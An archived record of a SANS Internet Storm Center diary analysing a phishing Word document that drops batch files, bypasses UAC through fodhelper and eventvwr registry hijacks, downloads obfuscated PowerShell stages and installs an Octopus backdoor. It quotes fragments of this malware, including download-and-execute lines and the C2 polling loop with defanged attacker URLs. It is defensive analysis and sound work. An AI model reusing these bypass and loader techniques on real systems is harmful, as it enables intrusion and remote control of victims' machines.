{
	"id": "301169a5-249e-4057-b801-86c646bf2ad2",
	"created_at": "2026-04-06T00:09:02.125705Z",
	"updated_at": "2026-04-10T03:21:58.698596Z",
	"deleted_at": null,
	"sha1_hash": "f73dfa265e43f1fa1906821654c5228f166c2d49",
	"title": "Malicious Word Document Delivering an Octopus Backdoor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2783445,
	"plain_text": "Malicious Word Document Delivering an Octopus Backdoor\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 12:40:09 UTC\r\nHere is an interesting malicious Word document that I spotted yesterday. This time, it does not contain a macro but\r\ntwo embedded objects that the victim must \"activate\" (click on one of them) to perform the malicious activities. The\r\ndocument (SHA256:ba6cc16770dc67c1af1a3e103c3fd19a854193e7cd1fecbb11ca11c2c47cdf04) has a VT score of\r\n20/62[1]:\r\nA quick analysis with oledump.py indeed reveals the presence of two embedded objects (the \"O\" indicator):\r\nremnux@remnux:~$ oledump.py ba6cc16770dc67c1af1a3e103c3fd19a854193e7cd1fecbb11ca11c2c47cdf04.doc.vir\r\n 1: 114 '\\x01CompObj'\r\n 2: 280 '\\x05DocumentSummaryInformation'\r\n 3: 416 '\\x05SummaryInformation'\r\nhttps://isc.sans.edu/diary/26918\r\nPage 1 of 5\n\n 4: 7338 '1Table'\r\n 5: 4096 'Data'\r\n 6: O 1329 'ObjectPool/_1670067230/\\x01Ole10Native'\r\n 7: 6 'ObjectPool/_1670067230/\\x03ObjInfo'\r\n 8: O 1536 'ObjectPool/_1670067231/\\x01Ole10Native'\r\n 9: 6 'ObjectPool/_1670067231/\\x03ObjInfo'\r\n 10: 4096 'WordDocument'\r\nYou can extract them via oledump.py or directly from the document (if you have Word in your sandbox). Both\r\nobjects are the same and contain a Windows batch file. 
Note the double extension:\r\nHIRING FORM.DOC.bat\r\nCONDITIONS OF THE CONTRACT.PDF.bat\r\nHere is the content (beautified):\r\n@echo Off\r\nfor /f \"tokens=2 delims=,\" %%i in ('wmic os get caption^,version /format:csv') do set os=%%i\r\necho %os%|find \" 10 \"\u003enul\r\n \u0026\u0026 reg add HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\r\n \u0026\u0026 reg add HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command /d \"cmd.exe /c powershell -WindowStyl\r\n \u0026\u0026 START /W fodhelper.exe\r\n \u0026\u0026 reg delete HKCU\\Software\\Classes\\ms-settings /f||reg.exe add hkcu\\software\\classes\\mscfile\\shell\\o\r\n \u0026\u0026 START /W eventvwr.exe\r\n \u0026\u0026 reg delete HKEY_CURRENT_USER\\Software\\Classes\\mscfile /f\r\nThis script tests the operating system version and, if the victim's computer is running Windows 10, attempts two UAC\r\nbypass techniques:\r\nThe first one targets 'fodhelper.exe' by creating a registry key 'HKCU:\\Software\\Classes\\ms-settings\\shell\\open\\command\\DelegateExecute'. The second one targets 'eventvwr.exe'. This is a common technique\r\nthat attackers have used for a while.\r\nThe privileged command executes a simple PowerShell script that fetches the next-stage payload and executes it. 
This\r\n'sc.bat' is heavily obfuscated:\r\nThis file contains Chinese characters, but interesting strings can be extracted:\r\nremnux@remnux:~$ strings -n 20 sc.bat\r\n=R7cBqDS KFeZWNzhyTrOCGUE3gmujl4@dnxQk0wvbVYIi5aJ8HM1tA2o6L9XfspP\"\r\n%ImJ:~44,1%%ImJ:~41,1%%ImJ:~31,1%%ImJ:~1,1%%ImJ:~7,1%\"\r\n=%ImJ:~54,1%%ImJ:~34,1%%ImJ:~55,1%%ImJ:~40,1%%g\r\n%%ImJ:~43,1%%ImJ:~53,1%%ImJ:~26,1%%ImJ:~3,1%%\r\n%%ImJ:~61,1%%ImJ:~46,1%%ImJ:~31,1%%ImJ:~24,1%%ImJ:~18,1%%ImJ:~41,1%%ImJ:~16,1%%ImJ:~57,1%%ImJ:~20,1%%Im\r\n%%ImJ:~9,1%%ImJ:~50,1%%ImJ:~6,1%%ImJ:~14,1%%ImJ:~44,1%%ImJ:~25,1%%ImJ:~36,1%%ImJ:~59,1%%ImJ:~30,1%%ImJ:\r\n%%ImJ:~15,1%%ImJ:~47,1%%ImJ:~12,1%%ImJ:~45,1%%ImJ:~56,1%%ImJ:~5,1%%ImJ:~1,1%%ImJ:~32,1%%\r\n%%ImJ:~38,1%%ImJ:~10,1%%ImJ:~2,1%%ImJ:~0,1%%ImJ:~29,1%%ImJ:~48,1%%ImJ:~13,1%%ImJ:~28,1%%ImJ:~37,1%%ImJ:\r\n%bIY:~45,1%%bIY:~38,1%%bIY:~57,1%%bIY:~6,1%%bIY:~23,1%\"\r\n%bIY:~35,1%%bIY:~56,1%=%bIY:~43,1%%N\r\n%%bIY:~29,1%%bIY:~12,1%%bIY:~38,1%%bIY:~28,1%%bIY:~49,1%%bIY:~37,1%%bIY:~51,1%%bIY:~33,1%%bIY:~32,1%%\r\n%%bIY:~24,1%%bIY:~46,1%%bIY:~11,1%%bIY:~31,1%%bIY:~63,1%%bIY:~7,1%%bIY:~36,1%%bIY:~40,1%%bIY:~1,1%%bIY:\r\nm%%bIY:~25,1%%bIY:~34,1%%bIY:~45,1%%bIY:~0,1%%bIY:~19,1%%bIY:~39,1%%bIY:~2,1%%bIY:~60,1%%bIY:~30,1%%bIY\r\nF%%bIY:~22,1%%bIY:~53,1%%bIY:~41,1%%bIY:~56,1%%Pc\r\nM%%bIY:~27,1%%bIY:~21,1%%bIY:~23,1%%bIY:~26,1%%_\r\nYW%%bIY:~8,1%%bIY:~6,1%%bIY:~59,1%%bIY:~3,1%%bIY:~17,1%%bIY:~16,1%%bIY:~14,1%%bIY:~9,1%%bIY:~35,1%%bIY:\r\n:~54,1%://hpsj[.]firewall-gateway[.]net:80/hpjs.php');\\\"\"\r\n:~54,1%://hpsj[.]firewall-gateway[.]net:8080/MicrosoftUpdate\"%bK\r\n:~60,1%://is[.]gd/xbQIQ2','C:\\Users\\Public\\Libraries\\pus.bat');\"%bK\r\n:~62,1%:\\Users\\Public\\Libraries\\pus.bat\r\n:~54,1%://hpsj[.]firewall-gateway[.]net:8080/MicrosoftUpdate'%bK\r\n:~62,1%:\\Users\\Public\\Libraries\\pus.bat'%bK\r\n
:~54,1%://hpsj[.]firewall-gateway[.]net:8080/MicrosoftUpdate\r\n:~54,1%://hpsj[.]firewall-gateway[.]net:80/hta\r\nIt downloads more malicious code from the URLs present in the file.\r\nThe first one from hxxp://hpsj.firewall-gateway.net/hta:\r\nvar cm=\"powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSyste\r\nvar w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup');\r\nw32ps.SpawnInstance_();\r\nw32ps.ShowWindow=0;\r\nvar rtrnCode=GetObject('winmgmts:').Get('Win32_Process').Create(cm,'c:\\\\',w32ps,null);\r\nThe returned data contains PowerShell code that is executed through the 'IEX' command.\r\nThe second script from hxxp://hpsj.firewall-gateway[.]net:8080/MicrosoftUpdate exfiltrates information about the\r\nvictim to the C2:\r\nNow, let's have a look at the PowerShell code retrieved above. It's a backdoor that keeps contact with the C2 via\r\nsimple HTTP requests:\r\nwhile($true){\r\n try{\r\n $command_raw = $wc2.downloadString(\"hxxp://hpsj[.]firewall-gateway[.]net:80/view/$IHW\");\r\n }catch{\r\n $failure_counter=$failure_counter +1;\r\n if ($failure_counter -eq 10){\r\n kill $pid\r\n }\r\n }\r\nThe variable \"$IHW\" identifies the victim. The following commands are supported:\r\nReport: To return information about the victim (processes, IP address, etc.)\r\nDownload: To retrieve a file\r\nreset-ps: To reset the PowerShell session\r\nAny other command is interpreted via 'Invoke-Expression'.\r\nAll communications occur on top of HTTP, but the data are AES-encrypted. Checking deeper, we are facing an\r\nOctopus[2] backdoor. This framework has been developed to help red teams compromise victims and gather information\r\nfrom them. 
In this case, it was not an exercise but a real phishing campaign targeting specific users.\r\nI wish you a Merry Christmas and stay safe!\r\n[1] https://www.virustotal.com/gui/file/ba6cc16770dc67c1af1a3e103c3fd19a854193e7cd1fecbb11ca11c2c47cdf04/detection\r\n[2] https://github.com/mhaskar/Octopus\r\nXavier Mertens (@xme)\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nPGP Key\r\nSource: https://isc.sans.edu/diary/26918",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/diary/26918"
	],
	"report_names": [
		"26918"
	],
	"threat_actors": [],
	"ts_created_at": 1775434142,
	"ts_updated_at": 1775791318,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f73dfa265e43f1fa1906821654c5228f166c2d49.pdf",
		"text": "https://archive.orkl.eu/f73dfa265e43f1fa1906821654c5228f166c2d49.txt",
		"img": "https://archive.orkl.eu/f73dfa265e43f1fa1906821654c5228f166c2d49.jpg"
	}
}